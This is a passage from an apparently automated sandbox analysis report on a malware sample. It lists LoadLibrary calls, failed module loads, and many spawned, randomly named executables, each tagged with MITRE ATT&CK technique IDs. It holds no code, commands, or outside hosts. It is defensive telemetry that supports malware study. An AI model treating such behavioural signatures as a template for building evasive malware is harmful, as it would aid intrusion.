\"nnpjtv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003892)\n \"nnpjtv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003892)\n \"nnpjtv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003892)\n \"rbpjdh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003712)\n \"rbpjdh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003712)\n \"rbpjdh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003712)\n \"rbpjdh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003712)\n \"68804.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003728)\n \"68804.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003728)\n \"68804.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003728)\n \"68804.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003728)\n \"264608.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004228)\n \"264608.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004228)\n \"264608.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004228)\n \"264608.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004228)\n \"264608.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00004228)\n \"264608.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004228)\n \"264608.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004228)\n \"hbxvf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002108)\n \"hbxvf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002108)\n \"hbxvf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002108)\n \"hbxvf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002108)\n \"djhdv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003784)\n \"djhdv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003784)\n \"djhdv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003784)\n \"djhdv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003784)\n \"ndnvnh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003840)\n \"ndnvnh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003840)\n \"ndnvnh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003840)\n \"ndnvnh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003840)\n \"nhxhrtb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003364)\n \"nhxhrtb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003364)\n \"nhxhrtb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003364)\n \"nhxhrtb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003364)\n \"fjprrfr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001820)\n \"fjprrfr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001820)\n \"fjprrfr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001820)\n \"fjprrfr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001820)\n \"080068.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004316)\n \"080068.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004316)\n \"080068.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004316)\n \"080068.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004316)\n \"04028.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002064)\n \"04028.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002064)\n \"04028.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002064)\n \"04028.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002064)\n \"04028.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00002064)\n \"04028.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00002064)\n \"04028.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002064)\n \"jjtpnvv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001428)\n \"jjtpnvv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001428)\n \"jjtpnvv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001428)\n \"jjtpnvv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001428)\n \"jjtpnvv.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00001428)\n \"jjtpnvv.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00001428)\n \"jjtpnvv.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00001428)\n \"vtrrrtd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003368)\n \"vtrrrtd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003368)\n \"vtrrrtd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003368)\n \"vtrrrtd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003368)\n \"llrlf.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003604)\n \"llrlf.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003604)\n \"llrlf.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003604)\n \"djblbb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004432)\n \"djblbb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004432)\n \"djblbb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004432)\n \"djblbb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004432)\n \"bnjttb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000788)\n \"bnjttb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000788)\n \"bnjttb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000788)\n \"bnjttb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000788)\n \"jxtvd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002028)\n \"jxtvd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002028)\n \"jxtvd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002028)\n \"jxtvd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002028)\n \"480606.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003484)\n \"480606.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003484)\n \"480606.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003484)\n \"480606.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003484)\n \"684202.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004308)\n \"684202.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004308)\n \"684202.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004308)\n \"684202.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004308)\n \"244640.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002380)\n \"244640.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002380)\n \"244640.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002380)\n \"244640.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002380)\n \"6662204.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002860)\n \"6662204.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002860)\n \"6662204.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002860)\n \"6662204.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002860)\n \"6602848.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002736)\n \"6602848.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002736)\n \"6602848.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002736)\n \"6602848.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002736)\n \"jfpjt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001852)\n \"jfpjt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001852)\n \"jfpjt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001852)\n \"jfpjt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001852)\n \"frftj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000108)\n \"frftj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000108)\n \"frftj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000108)\n \"frftj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000108)\n \"22228.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001856)\n \"22228.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001856)\n \"22228.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001856)\n \"22228.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001856)\n \"66846.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003656)\n \"66846.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003656)\n \"66846.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003656)\n \"66846.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003656)\n \"242220.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002584)\n \"242220.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002584)\n \"242220.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002584)\n \"242220.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002584)\n \"nxdndh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003096)\n \"nxdndh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003096)\n \"nxdndh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003096)\n \"nxdndh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003096)\n \"rndlb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004256)\n \"rndlb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004256)\n \"rndlb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004256)\n \"rndlb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004256)\n \"ldprbfj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001212)\n \"ldprbfj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001212)\n \"ldprbfj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001212)\n \"ldprbfj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001212)\n \"ddxvh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003860)\n \"ddxvh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003860)\n \"ddxvh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003860)\n \"ddxvh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003860)\n \"422022.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004680)\n \"422022.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004680)\n \"422022.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004680)\n \"422022.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004680)\n \"402060.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003740)\n \"402060.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003740)\n \"402060.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003740)\n \"402060.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003740)\n \"606282.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003752)\n \"606282.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003752)\n \"606282.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003752)\n \"606282.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003752)\n \"nxthl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002116)\n \"nxthl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002116)\n \"nxthl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002116)\n \"nxthl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002116)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"vnxhhp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vnxhhp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hvnjft.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hvnjft.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8284862.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8284862.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"2664824.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"2664824.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rbndhnn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rbndhnn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ltnxl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ltnxl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rllbfv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rllbfv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nnpjtv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nnpjtv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rbpjdh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rbpjdh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"68804.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"68804.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"264608.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"264608.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hbxvf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hbxvf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"djhdv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"djhdv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ndnvnh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ndnvnh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nhxhrtb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nhxhrtb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fjprrfr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fjprrfr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"080068.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"080068.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"04028.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"04028.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jjtpnvv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jjtpnvv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vtrrrtd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vtrrrtd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"djblbb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"djblbb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bnjttb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bnjttb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jxtvd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jxtvd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"480606.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"480606.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"684202.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"684202.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"244640.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"244640.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6662204.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6662204.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6602848.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6602848.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jfpjt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jfpjt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"frftj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"frftj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"22228.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"22228.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"66846.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"66846.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"242220.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"242220.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nxdndh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nxdndh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rndlb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rndlb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ldprbfj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ldprbfj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ddxvh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ddxvh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"422022.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"422022.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"402060.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"402060.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"606282.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"606282.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nxthl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nxthl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"vnxhhp.exe\" (UID: 00000000-00005936)\n Spawned process \"hvnjft.exe\" (UID: 00000000-00005952)\n Spawned process \"lxpbndn.exe\" (UID: 00000000-00004248)\n Spawned process \"8284862.exe\" (UID: 00000000-00006080)\n Spawned process \"2664824.exe\" (UID: 00000000-00004516)\n Spawned process \"rbndhnn.exe\" (UID: 00000000-00006132)\n Spawned process \"ltnxl.exe\" (UID: 00000000-00006140)\n Spawned process \"rllbfv.exe\" (UID: 00000000-00005416)\n Spawned process \"jvvbdv.exe\" (UID: 00000000-00006096)\n Spawned process \"nnpjtv.exe\" (UID: 00000000-00003892)\n Spawned process \"rbpjdh.exe\" (UID: 00000000-00003712)\n Spawned process \"vnxlf.exe\" (UID: 00000000-00003852)\n Spawned process \"68804.exe\" (UID: 00000000-00003728)\n Spawned process \"264608.exe\" (UID: 00000000-00004228)\n Spawned process \"hbxvf.exe\" (UID: 00000000-00002108)\n Spawned process \"djhdv.exe\" (UID: 00000000-00003784)\n Spawned process \"vvlhl.exe\" (UID: 00000000-00004548)\n Spawned process \"ndnvnh.exe\" (UID: 00000000-00003840)\n Spawned process \"nhxhrtb.exe\" (UID: 00000000-00003364)\n Spawned process \"hhprhp.exe\" (UID: 00000000-00004416)\n Spawned process \"fjprrfr.exe\" (UID: 00000000-00001820)\n Spawned process \"nxxhj.exe\" (UID: 00000000-00003776)\n Spawned process \"6644682.exe\" (UID: 00000000-00004584)\n Spawned process \"4442828.exe\" (UID: 00000000-00003716)\n Spawned process \"080068.exe\" (UID: 00000000-00004316)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"vnxhhp.exe\" (UID: 00000000-00005936)\n Spawned process \"hvnjft.exe\" (UID: 00000000-00005952)\n Spawned process \"lxpbndn.exe\" (UID: 00000000-00004248)\n Spawned process \"8284862.exe\" (UID: 00000000-00006080)\n Spawned process \"2664824.exe\" (UID: 00000000-00004516)\n Spawned process \"rbndhnn.exe\" (UID: 00000000-00006132)\n Spawned process \"ltnxl.exe\" (UID: 00000000-00006140)\n Spawned process \"rllbfv.exe\" (UID: 00000000-00005416)\n Spawned process \"jvvbdv.exe\" (UID: 00000000-00006096)\n Spawned process \"nnpjtv.exe\" (UID: 00000000-00003892)\n Spawned process \"rbpjdh.exe\" (UID: 00000000-00003712)\n Spawned process \"vnxlf.exe\" (UID: 00000000-00003852)\n Spawned process \"68804.exe\" (UID: 00000000-00003728)\n Spawned process \"264608.exe\" (UID: 00000000-00004228)\n Spawned process \"hbxvf.exe\" (UID: 00000000-00002108)\n Spawned process \"djhdv.exe\" (UID: 00000000-00003784)\n Spawned process \"vvlhl.exe\" (UID: 00000000-00004548)\n Spawned process \"ndnvnh.exe\" (UID: 00000000-00003840)\n Spawned process \"nhxhrtb.exe\" (UID: 00000000-00003364)\n Spawned process \"hhprhp.exe\" (UID: 00000000-00004416)\n Spawned process \"fjprrfr.exe\" (UID: 00000000-00001820)\n Spawned process \"nxxhj.exe\" (UID: 